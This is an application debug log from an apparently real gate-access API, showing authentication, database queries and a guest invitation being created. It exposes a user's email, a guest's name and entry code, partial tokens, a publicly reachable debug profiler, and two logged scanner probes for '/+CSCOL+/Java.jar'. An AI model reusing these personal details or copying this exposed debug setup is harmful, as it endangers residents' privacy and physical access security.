[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:49] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:49] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:49] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:49] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:55] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:55] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:55] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:55] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:55] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:55] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:55] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:55] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:55] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:56] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:32:04] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-21 00:32:04] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:32:04] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:32:04] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:32:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:32:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:04] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:04] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:32:04] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:04] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:04] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-21 00:32:04] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:32:04] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"a57763e3-108b-4975-b9e8-a8 [...]","2":1,"3":"2025-12-21 00:32:04","4":"2025-12-21 00:32:04","5":"Izmir","6":"Gallardo","7":"513736","8":"/invitation/c1bd9d30ff6474 [...]","9":"2","10":"1","11":"2025-12-21 19:45:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-21 00:32:04] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-21 00:32:04] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:32:05] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-21 00:32:05] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:32:05] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:32:05] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:32:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:32:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:05] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:05] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:32:05] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:05] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:05] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:32:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:34:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"99cc82","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/99cc82","method":"GET"} []
[2025-12-21 00:34:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 00:35:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9f7f1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9f7f1","method":"GET"} []
[2025-12-21 00:35:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 00:39:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:39:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:47:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=request","method":"GET"} []
[2025-12-21 00:47:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 00:49:32] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:49:32] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
